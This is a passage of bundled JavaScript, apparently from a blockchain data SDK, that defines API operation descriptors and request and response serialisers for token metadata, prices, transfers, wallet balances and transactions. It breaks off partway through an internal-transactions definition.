/** Get the metadata for a given token contract address (name, symbol, decimals, logo). */ var $3dfc2d9370ba0cd1$export$b722950d28f32054 = {
    method: "GET",
    name: "getTokenMetadata",
    id: "getTokenMetadata",
    groupName: "token",
    urlPathPattern: "/erc20/metadata",
    urlSearchParamNames: [
        "chain",
        "addresses"
    ],
    getRequestUrlParams: $3dfc2d9370ba0cd1$var$getRequestUrlParams$c,
    serializeRequest: $3dfc2d9370ba0cd1$var$serializeRequest$c,
    deserializeRequest: $3dfc2d9370ba0cd1$var$deserializeRequest$c,
    deserializeResponse: $3dfc2d9370ba0cd1$var$deserializeResponse$c
};
// Methods
function $3dfc2d9370ba0cd1$var$getRequestUrlParams$c(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        addresses: request.addresses.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address).lowercase;
        })
    };
}
function $3dfc2d9370ba0cd1$var$deserializeResponse$c(jsonResponse, request, core) {
    return (jsonResponse !== null && jsonResponse !== void 0 ? jsonResponse : []).map(function(token) {
        return {
            token: $3dfc2d9370ba0cd1$export$28ff99e69b404cc.create($3dfc2d9370ba0cd1$var$__assign($3dfc2d9370ba0cd1$var$__assign({}, (0, $10891f2cb3e98601$export$86f54f62aa7a7514)(token)), {
                contractAddress: token.address,
                chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core)
            })),
            blockNumber: token.block_number,
            validated: token.validated
        };
    });
}
function $3dfc2d9370ba0cd1$var$serializeRequest$c(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        addresses: request.addresses.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address).checksum;
        })
    };
}
function $3dfc2d9370ba0cd1$var$deserializeRequest$c(jsonRequest) {
    return {
        chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(jsonRequest.chain),
        addresses: jsonRequest.addresses.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address);
        })
    };
}
/** Get the token price denominated in the blockchains native token and USD. */ var $3dfc2d9370ba0cd1$export$fc69d783890468cd = {
    method: "GET",
    name: "getTokenPrice",
    id: "getTokenPrice",
    groupName: "token",
    urlPathPattern: "/erc20/{address}/price",
    urlPathParamNames: [
        "address"
    ],
    urlSearchParamNames: [
        "chain",
        "exchange",
        "toBlock"
    ],
    getRequestUrlParams: $3dfc2d9370ba0cd1$var$getRequestUrlParams$b,
    serializeRequest: $3dfc2d9370ba0cd1$var$serializeRequest$b,
    deserializeRequest: $3dfc2d9370ba0cd1$var$deserializeRequest$b,
    deserializeResponse: $3dfc2d9370ba0cd1$var$deserializeResponse$b
};
// Methods
function $3dfc2d9370ba0cd1$var$getRequestUrlParams$b(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        exchange: request.exchange,
        to_block: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.toBlock, String),
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.address).lowercase
    };
}
function $3dfc2d9370ba0cd1$var$deserializeResponse$b(jsonResponse) {
    var _a, _b, _c;
    return $3dfc2d9370ba0cd1$var$__assign($3dfc2d9370ba0cd1$var$__assign({}, (0, $10891f2cb3e98601$export$86f54f62aa7a7514)(jsonResponse)), {
        nativePrice: ((_a = jsonResponse.nativePrice) === null || _a === void 0 ? void 0 : _a.value) ? $3dfc2d9370ba0cd1$export$62862bdd1f71aa78.create((_b = jsonResponse.nativePrice) === null || _b === void 0 ? void 0 : _b.value, (_c = jsonResponse.nativePrice) === null || _c === void 0 ? void 0 : _c.decimals) : null,
        exchangeAddress: jsonResponse.exchangeAddress ? $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(jsonResponse.exchangeAddress) : null
    });
}
function $3dfc2d9370ba0cd1$var$serializeRequest$b(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        exchange: request.exchange,
        toBlock: request.toBlock,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.address).checksum
    };
}
function $3dfc2d9370ba0cd1$var$deserializeRequest$b(jsonRequest) {
    return {
        chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(jsonRequest.chain),
        exchange: jsonRequest.exchange,
        toBlock: jsonRequest.toBlock,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(jsonRequest.address)
    };
}
/** Get ERC20 token transactions from a contract ordered by block number in descending order. */ var $3dfc2d9370ba0cd1$export$699bb7c67626970 = {
    method: "GET",
    name: "getTokenTransfers",
    id: "getTokenTransfers",
    groupName: "token",
    urlPathPattern: "/erc20/{address}/transfers",
    urlPathParamNames: [
        "address"
    ],
    urlSearchParamNames: [
        "chain",
        "fromBlock",
        "toBlock",
        "fromDate",
        "toDate",
        "limit",
        "cursor",
        "disableTotal"
    ],
    firstPageIndex: 0,
    getRequestUrlParams: $3dfc2d9370ba0cd1$var$getRequestUrlParams$a,
    serializeRequest: $3dfc2d9370ba0cd1$var$serializeRequest$a,
    deserializeRequest: $3dfc2d9370ba0cd1$var$deserializeRequest$a,
    deserializeResponse: $3dfc2d9370ba0cd1$var$deserializeResponse$a
};
// Methods
function $3dfc2d9370ba0cd1$var$getRequestUrlParams$a(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        from_block: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.fromBlock, String),
        to_block: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.toBlock, String),
        from_date: request.fromDate ? new Date(request.fromDate).toISOString() : undefined,
        to_date: request.toDate ? new Date(request.toDate).toISOString() : undefined,
        limit: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.limit, String),
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.address).lowercase,
        cursor: request.cursor,
        disable_total: request.disableTotal
    };
}
function $3dfc2d9370ba0cd1$var$deserializeResponse$a(jsonResponse, request, core) {
    var _a;
    return ((_a = jsonResponse.result) !== null && _a !== void 0 ? _a : []).map(function(transfer) {
        return $3dfc2d9370ba0cd1$export$99bc868996d177b5.create($3dfc2d9370ba0cd1$var$__assign($3dfc2d9370ba0cd1$var$__assign({}, (0, $10891f2cb3e98601$export$86f54f62aa7a7514)(transfer)), {
            chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core),
            address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(transfer.address),
            toAddress: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(transfer.to_address),
            fromAddress: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(transfer.from_address),
            value: (0, $10891f2cb3e98601$export$d97aa349ed20696).create(transfer.value),
            blockTimestamp: new Date(transfer.block_timestamp)
        }));
    });
}
function $3dfc2d9370ba0cd1$var$serializeRequest$a(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        fromBlock: request.fromBlock,
        toBlock: request.toBlock,
        fromDate: request.fromDate,
        toDate: request.toDate,
        limit: request.limit,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.address).checksum,
        cursor: request.cursor,
        disableTotal: request.disableTotal
    };
}
function $3dfc2d9370ba0cd1$var$deserializeRequest$a(jsonRequest) {
    return {
        chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(jsonRequest.chain),
        fromBlock: jsonRequest.fromBlock,
        toBlock: jsonRequest.toBlock,
        fromDate: jsonRequest.fromDate,
        toDate: jsonRequest.toDate,
        limit: jsonRequest.limit,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(jsonRequest.address),
        cursor: jsonRequest.cursor,
        disableTotal: jsonRequest.disableTotal
    };
}
/** Get token balances for a specific wallet address. */ var $3dfc2d9370ba0cd1$export$59de9565a776890f = {
    method: "GET",
    name: "getWalletTokenBalances",
    id: "getWalletTokenBalances",
    groupName: "token",
    urlPathPattern: "/{address}/erc20",
    urlPathParamNames: [
        "address"
    ],
    urlSearchParamNames: [
        "chain",
        "toBlock",
        "tokenAddresses"
    ],
    getRequestUrlParams: $3dfc2d9370ba0cd1$var$getRequestUrlParams$9,
    serializeRequest: $3dfc2d9370ba0cd1$var$serializeRequest$9,
    deserializeRequest: $3dfc2d9370ba0cd1$var$deserializeRequest$9,
    deserializeResponse: $3dfc2d9370ba0cd1$var$deserializeResponse$9
};
// Methods
function $3dfc2d9370ba0cd1$var$getRequestUrlParams$9(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        to_block: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.toBlock, String),
        token_addresses: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.tokenAddresses, function(addresses) {
            return addresses.map(function(address) {
                return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address).lowercase;
            });
        }),
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.address).lowercase
    };
}
function $3dfc2d9370ba0cd1$var$deserializeResponse$9(jsonResponse, request, core) {
    return (jsonResponse !== null && jsonResponse !== void 0 ? jsonResponse : []).map(function(token) {
        return $3dfc2d9370ba0cd1$export$a94fa3bfa24fb2be.create(token.balance, {
            decimals: token.decimals,
            token: {
                decimals: token.decimals,
                name: token.name,
                symbol: token.symbol,
                contractAddress: token.token_address,
                logo: token.logo,
                thumbnail: token.thumbnail,
                chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core),
                possibleSpam: token.possible_spam
            }
        });
    });
}
function $3dfc2d9370ba0cd1$var$serializeRequest$9(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        tokenAddresses: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.tokenAddresses, function(addresses) {
            return addresses.map(function(address) {
                return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address).checksum;
            });
        }),
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.address).checksum,
        toBlock: request.toBlock
    };
}
function $3dfc2d9370ba0cd1$var$deserializeRequest$9(jsonRequest) {
    return {
        chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(jsonRequest.chain),
        tokenAddresses: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(jsonRequest.tokenAddresses, function(addresses) {
            return addresses.map(function(address) {
                return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address);
            });
        }),
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(jsonRequest.address),
        toBlock: jsonRequest.toBlock
    };
}
/** Get ERC20 token transactions ordered by block number in descending order. */ var $3dfc2d9370ba0cd1$export$a787c09a62ee9e2d = {
    method: "GET",
    name: "getWalletTokenTransfers",
    id: "getWalletTokenTransfers",
    groupName: "token",
    urlPathPattern: "/{address}/erc20/transfers",
    urlPathParamNames: [
        "address"
    ],
    urlSearchParamNames: [
        "chain",
        "fromBlock",
        "toBlock",
        "fromDate",
        "toDate",
        "limit",
        "cursor",
        "disableTotal"
    ],
    firstPageIndex: 0,
    getRequestUrlParams: $3dfc2d9370ba0cd1$var$getRequestUrlParams$8,
    serializeRequest: $3dfc2d9370ba0cd1$var$serializeRequest$8,
    deserializeRequest: $3dfc2d9370ba0cd1$var$deserializeRequest$8,
    deserializeResponse: $3dfc2d9370ba0cd1$var$deserializeResponse$8
};
// Methods
function $3dfc2d9370ba0cd1$var$getRequestUrlParams$8(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.address).lowercase,
        from_block: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.fromBlock, String),
        to_block: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.toBlock, String),
        from_date: request.fromDate ? new Date(request.fromDate).toISOString() : undefined,
        to_date: request.toDate ? new Date(request.toDate).toISOString() : undefined,
        limit: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.limit, String),
        cursor: request.cursor,
        disable_total: request.disableTotal
    };
}
function $3dfc2d9370ba0cd1$var$deserializeResponse$8(jsonResponse, request, core) {
    var _a;
    return ((_a = jsonResponse.result) !== null && _a !== void 0 ? _a : []).map(function(transfer) {
        return $3dfc2d9370ba0cd1$export$99bc868996d177b5.create($3dfc2d9370ba0cd1$var$__assign($3dfc2d9370ba0cd1$var$__assign({}, (0, $10891f2cb3e98601$export$86f54f62aa7a7514)(transfer)), {
            chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core),
            address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(transfer.address),
            toAddress: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(transfer.to_address),
            fromAddress: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(transfer.from_address),
            value: (0, $10891f2cb3e98601$export$d97aa349ed20696).create(transfer.value),
            blockTimestamp: new Date(transfer.block_timestamp)
        }));
    });
}
function $3dfc2d9370ba0cd1$var$serializeRequest$8(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.address).checksum,
        fromBlock: request.fromBlock,
        toBlock: request.toBlock,
        fromDate: request.fromDate,
        toDate: request.toDate,
        limit: request.limit,
        cursor: request.cursor,
        disableTotal: request.disableTotal
    };
}
function $3dfc2d9370ba0cd1$var$deserializeRequest$8(jsonRequest) {
    return {
        chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(jsonRequest.chain),
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(jsonRequest.address),
        fromBlock: jsonRequest.fromBlock,
        toBlock: jsonRequest.toBlock,
        fromDate: jsonRequest.fromDate,
        toDate: jsonRequest.toDate,
        limit: jsonRequest.limit,
        cursor: jsonRequest.cursor,
        disableTotal: jsonRequest.disableTotal
    };
}
/** Get the contents of a transaction by the given transaction hash. */ var $3dfc2d9370ba0cd1$export$4b742acef4c40754 = {
    method: "GET",
    name: "getTransaction",
    id: "getTransaction",
    groupName: "transaction",
    isNullable: true,
    urlPathPattern: "/transaction/{transactionHash}",
    urlPathParamNames: [
        "transactionHash"
    ],
    urlSearchParamNames: [
        "chain",
        "include"
    ],
    getRequestUrlParams: $3dfc2d9370ba0cd1$var$getRequestUrlParams$7,
    serializeRequest: $3dfc2d9370ba0cd1$var$serializeRequest$7,
    deserializeRequest: $3dfc2d9370ba0cd1$var$deserializeRequest$7,
    deserializeResponse: $3dfc2d9370ba0cd1$var$deserializeResponse$7
};
function $3dfc2d9370ba0cd1$var$getRequestUrlParams$7(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        transactionHash: request.transactionHash,
        include: request.include
    };
}
function $3dfc2d9370ba0cd1$var$serializeRequest$7(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        transactionHash: request.transactionHash,
        include: request.include
    };
}
function $3dfc2d9370ba0cd1$var$deserializeRequest$7(jsonRequest) {
    return {
        chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(jsonRequest.chain),
        transactionHash: jsonRequest.transactionHash,
        include: jsonRequest.include
    };
}
//TODO: I noticed that the docs comes with a type of "string | unknown" which automatically resolves to "unknown". I think we should fix this in the api, casting for now
function $3dfc2d9370ba0cd1$var$deserializeResponse$7(jsonResponse, request, core) {
    var _a, _b;
    var chain = $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core);
    return $3dfc2d9370ba0cd1$export$1ecb3c5cbbcf4bef.create({
        from: jsonResponse.from_address,
        to: jsonResponse.to_address,
        value: jsonResponse.value,
        gasPrice: jsonResponse.gas_price,
        gasUsed: jsonResponse.receipt_gas_used,
        data: jsonResponse.input,
        nonce: jsonResponse.nonce,
        blockHash: jsonResponse.block_hash,
        blockNumber: jsonResponse.block_number,
        blockTimestamp: jsonResponse.block_timestamp,
        index: jsonResponse.transaction_index,
        chain: chain,
        hash: jsonResponse.hash,
        gas: jsonResponse.gas,
        cumulativeGasUsed: jsonResponse.receipt_cumulative_gas_used,
        contractAddress: jsonResponse.receipt_contract_address,
        logs: ((_a = jsonResponse.logs) !== null && _a !== void 0 ? _a : []).map(function(log) {
            return $3dfc2d9370ba0cd1$export$138ade50fb8052f5.create({
                address: log.address,
                blockHash: log.block_hash,
                blockNumber: +log.block_number,
                data: log.data,
                // eslint-disable-next-line @typescript-eslint/no-non-null-assertion
                topics: [
                    log.topic0,
                    log.topic1,
                    log.topic2,
                    log.topic3
                ],
                transactionHash: log.transaction_hash,
                blockTimestamp: log.block_timestamp,
                logIndex: +log.log_index,
                transactionIndex: +log.transaction_index,
                chain: chain
            });
        }),
        internalTransactions: ((_b = jsonResponse.internal_transactions) !== null && _b !== void 0 ? _b : []).map(function(jsonInternalTransaction) {
            var internalTransaction = (0, $10891f2cb3e98601$export$86f54f62aa7a7514)(jsonInternalTransaction);
            return $3dfc2d9370ba0cd1$export$9a834303a812ec41.create($3dfc2d9370ba0cd1$var$__assign({
                chain: chain
            }, internalTransaction));
        }),
        receiptRoot: jsonResponse.receipt_root,
        receiptStatus: jsonResponse.receipt_status
    });
}
/** Get the contents of a transaction by the given transaction hash. */ var $3dfc2d9370ba0cd1$export$5666de66a01cbd37 = {
    method: "GET",
    name: "getTransactionVerbose",
    id: "getTransactionVerbose",
    groupName: "transaction",
    isNullable: true,
    urlPathPattern: "/transaction/{transactionHash}/verbose",
    urlPathParamNames: [
        "transactionHash"
    ],
    urlSearchParamNames: [
        "chain",
        "include"
    ],
    getRequestUrlParams: $3dfc2d9370ba0cd1$var$getRequestUrlParams$6,
    serializeRequest: $3dfc2d9370ba0cd1$var$serializeRequest$6,
    deserializeRequest: $3dfc2d9370ba0cd1$var$deserializeRequest$6,
    deserializeResponse: $3dfc2d9370ba0cd1$var$deserializeResponse$6
};
function $3dfc2d9370ba0cd1$var$getRequestUrlParams$6(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        transactionHash: request.transactionHash,
        include: request.include
    };
}
function $3dfc2d9370ba0cd1$var$serializeRequest$6(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        transactionHash: request.transactionHash,
        include: request.include
    };
}
function $3dfc2d9370ba0cd1$var$deserializeRequest$6(jsonRequest) {
    return {
        chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(jsonRequest.chain),
        transactionHash: jsonRequest.transactionHash,
        include: jsonRequest.include
    };
}
function $3dfc2d9370ba0cd1$var$deserializeResponse$6(jsonResponse, request, core) {
    var _a;
    return $3dfc2d9370ba0cd1$export$36d7fa6a4ed9819e.create({
        from: jsonResponse.from_address,
        to: jsonResponse.to_address,
        value: jsonResponse.value,
        gasPrice: jsonResponse.gas_price,
        gasUsed: jsonResponse.receipt_gas_used,
        data: jsonResponse.input,
        nonce: jsonResponse.nonce,
        blockHash: jsonResponse.block_hash,
        blockNumber: jsonResponse.block_number,
        blockTimestamp: jsonResponse.block_timestamp,
        index: jsonResponse.transaction_index,
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core),
        hash: jsonResponse.hash,
        gas: jsonResponse.gas,
        cumulativeGasUsed: jsonResponse.receipt_cumulative_gas_used,
        contractAddress: jsonResponse.receipt_contract_address,
        logs: ((_a = jsonResponse.logs) !== null && _a !== void 0 ? _a : []).map(function(log) {
            return $3dfc2d9370ba0cd1$export$e876d43b94710cd3.create({
                address: log.address,
                blockHash: log.block_hash,
                blockNumber: +log.block_number,
                data: log.data,
                // eslint-disable-next-line @typescript-eslint/no-non-null-assertion
                topics: [
                    log.topic0,
                    log.topic1,
                    log.topic2,
                    log.topic3
                ],
                transactionHash: log.transaction_hash,
                blockTimestamp: log.block_timestamp,
                logIndex: +log.log_index,
                transactionIndex: +log.transaction_index,
                chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core),
                decodedEvent: log.decoded_event
            });
        }),
        decodedCall: jsonResponse.decoded_call,
        receiptRoot: jsonResponse.receipt_root,
        receiptStatus: jsonResponse.receipt_status
    });
}
/** Get native transactions ordered by block number in descending order. */ var $3dfc2d9370ba0cd1$export$bc6181f6a7d3e941 = {
    method: "GET",
    name: "getWalletTransactions",
    id: "getWalletTransactions",
    groupName: "transaction",
    urlPathPattern: "/{address}",
    urlPathParamNames: [
        "address"
    ],
    urlSearchParamNames: [
        "chain",
        "fromBlock",
        "toBlock",
        "fromDate",
        "toDate",
        "cursor",
        "limit",
        "disableTotal",
        "include"
    ],
    firstPageIndex: 0,
    getRequestUrlParams: $3dfc2d9370ba0cd1$var$getRequestUrlParams$5,
    serializeRequest: $3dfc2d9370ba0cd1$var$serializeRequest$5,
    deserializeRequest: $3dfc2d9370ba0cd1$var$deserializeRequest$5,
    deserializeResponse: $3dfc2d9370ba0cd1$var$deserializeResponse$5
};
// Methods
function $3dfc2d9370ba0cd1$var$getRequestUrlParams$5(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        from_block: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.fromBlock, String),
        to_block: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.toBlock, String),
        from_date: request.fromDate ? new Date(request.fromDate).toISOString() : undefined,
        to_date: request.toDate ? new Date(request.toDate).toISOString() : undefined,
        cursor: request.cursor,
        limit: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.limit, String),
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.address).lowercase,
        disable_total: request.disableTotal,
        include: request.include
    };
}
function $3dfc2d9370ba0cd1$var$serializeRequest$5(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        fromBlock: request.fromBlock,
        toBlock: request.toBlock,
        fromDate: request.fromDate,
        toDate: request.toDate,
        cursor: request.cursor,
        limit: request.limit,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.address).checksum,
        disableTotal: request.disableTotal,
        include: request.include
    };
}
function $3dfc2d9370ba0cd1$var$deserializeRequest$5(jsonRequest) {
    return {
        chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(jsonRequest.chain),
        fromBlock: jsonRequest.fromBlock,
        toBlock: jsonRequest.toBlock,
        fromDate: jsonRequest.fromDate,
        toDate: jsonRequest.toDate,
        cursor: jsonRequest.cursor,
        limit: jsonRequest.limit,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(jsonRequest.address),
        disableTotal: jsonRequest.disableTotal,
        include: jsonRequest.include
    };
}
function $3dfc2d9370ba0cd1$var$deserializeResponse$5(jsonResponse, request, core) {
    var _a;
    return ((_a = jsonResponse.result) !== null && _a !== void 0 ? _a : []).map(function(transfer) {
        var _a;
        var chain = $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core);
        return $3dfc2d9370ba0cd1$export$1ecb3c5cbbcf4bef.create({
            cumulativeGasUsed: transfer.receipt_cumulative_gas_used,
            gasPrice: transfer.gas_price,
            gasUsed: transfer.receipt_gas_used,
            index: +transfer.transaction_index,
            contractAddress: transfer.receipt_contract_address,
            receiptRoot: transfer.receipt_root,
            receiptStatus: +transfer.receipt_status,
            chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core),
            data: transfer.input,
            from: transfer.from_address,
            hash: transfer.hash,
            nonce: transfer.nonce,
            value: transfer.value,
            blockHash: transfer.block_hash,
            blockNumber: +transfer.block_number,
            blockTimestamp: new Date(transfer.block_timestamp),
            gas: transfer.gas ? (0, $10891f2cb3e98601$export$d97aa349ed20696).create(transfer.gas) : null,
            to: transfer.to_address ? transfer.to_address : null,
            internalTransactions: ((_a = transfer.internal_transactions) !== null && _a !== void 0 ? _a : []).map(function(jsonInternalTransaction) {
                var internalTransaction = (0, $10891f2cb3e98601$export$86f54f62aa7a7514)(jsonInternalTransaction);
                return $3dfc2d9370ba0cd1$export$9a834303a812ec41.create($3dfc2d9370ba0cd1$var$__assign({
                    chain: chain
                }, internalTransaction));
            })
        });
    });
}
/** Get native transactions ordered by block number in descending order. */ var $3dfc2d9370ba0cd1$export$ac08e7d18d7354a7 = {
    method: "GET",
    name: "getWalletTransactionsVerbose",
    id: "getWalletTransactionsVerbose",
    groupName: "transaction",
    urlPathPattern: "/{address}/verbose",
    urlPathParamNames: [
        "address"
    ],
    urlSearchParamNames: [
        "chain",
        "fromBlock",
        "toBlock",
        "fromDate",
        "toDate",
        "cursor",
        "limit",
        "disableTotal",
        "include"
    ],
    firstPageIndex: 0,
    getRequestUrlParams: $3dfc2d9370ba0cd1$var$getRequestUrlParams$4,
    serializeRequest: $3dfc2d9370ba0cd1$var$serializeRequest$4,
    deserializeRequest: $3dfc2d9370ba0cd1$var$deserializeRequest$4,
    deserializeResponse: $3dfc2d9370ba0cd1$var$deserializeResponse$4
};
// Methods
function $3dfc2d9370ba0cd1$var$getRequestUrlParams$4(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        from_block: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.fromBlock, String),
        to_block: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.toBlock, String),
        from_date: request.fromDate ? new Date(request.fromDate).toISOString() : undefined,
        to_date: request.toDate ? new Date(request.toDate).toISOString() : undefined,
        cursor: request.cursor,
        limit: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.limit, String),
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.address).lowercase,
        disable_total: request.disableTotal,
        include: request.include
    };
}
function $3dfc2d9370ba0cd1$var$serializeRequest$4(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        fromBlock: request.fromBlock,
        toBlock: request.toBlock,
        fromDate: request.fromDate,
        toDate: request.toDate,
        cursor: request.cursor,
        limit: request.limit,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.address).checksum,
        disableTotal: request.disableTotal,
        include: request.include
    };
}
function $3dfc2d9370ba0cd1$var$deserializeRequest$4(jsonRequest) {
    return {
        chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(jsonRequest.chain),
        fromBlock: jsonRequest.fromBlock,
        toBlock: jsonRequest.toBlock,
        fromDate: jsonRequest.fromDate,
        toDate: jsonRequest.toDate,
        cursor: jsonRequest.cursor,
        limit: jsonRequest.limit,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(jsonRequest.address),
        disableTotal: jsonRequest.disableTotal,
        include: jsonRequest.include
    };
}
function $3dfc2d9370ba0cd1$var$deserializeResponse$4(jsonResponse, request, core) {
    var _a;
    return ((_a = jsonResponse.result) !== null && _a !== void 0 ? _a : []).map(function(transfer) {
        var _a;
        return $3dfc2d9370ba0cd1$export$1ecb3c5cbbcf4bef.create({
            cumulativeGasUsed: transfer.receipt_cumulative_gas_used,
            gasPrice: transfer.gas_price,
            gasUsed: transfer.receipt_gas_used,
            index: +transfer.transaction_index,
            contractAddress: transfer.receipt_contract_address,
            receiptRoot: transfer.receipt_root,
            receiptStatus: +transfer.receipt_status,
            chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core),
            data: transfer.input,
            from: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(transfer.from_address),
            hash: transfer.hash,
            nonce: transfer.nonce,
            value: transfer.value,
            blockHash: transfer.block_hash,
            blockNumber: +transfer.block_number,
            blockTimestamp: new Date(transfer.block_timestamp),
            gas: (0, $10891f2cb3e98601$export$d97aa349ed20696).create(transfer.gas),
            to: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(transfer.to_address),
            logs: ((_a = transfer.logs) !== null && _a !== void 0 ? _a : []).map(function(log) {
                return $3dfc2d9370ba0cd1$export$138ade50fb8052f5.create({
                    logIndex: +log.log_index,
                    transactionHash: log.transaction_hash,
                    transactionIndex: +log.transaction_index,
                    address: log.address,
                    data: log.data,
                    topics: [
                        log.topic0,
                        log.topic1,
                        log.topic2,
                        log.topic3
                    ],
                    blockHash: log.block_hash,
                    blockNumber: +log.block_number,
                    blockTimestamp: transfer.block_timestamp,
                    chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core)
                });
            })
        });
    });
}
/** Get native transactions ordered by block number in descending order. */ var $3dfc2d9370ba0cd1$export$9ca00ae4093f2b0a = {
    method: "GET",
    name: "getInternalTransactions",
    id: "getInternalTransactions",
    groupName: "transaction",
    urlPathPattern: "/transaction/{transactionHash}/internal-transactions",
    urlPathParamNames: [
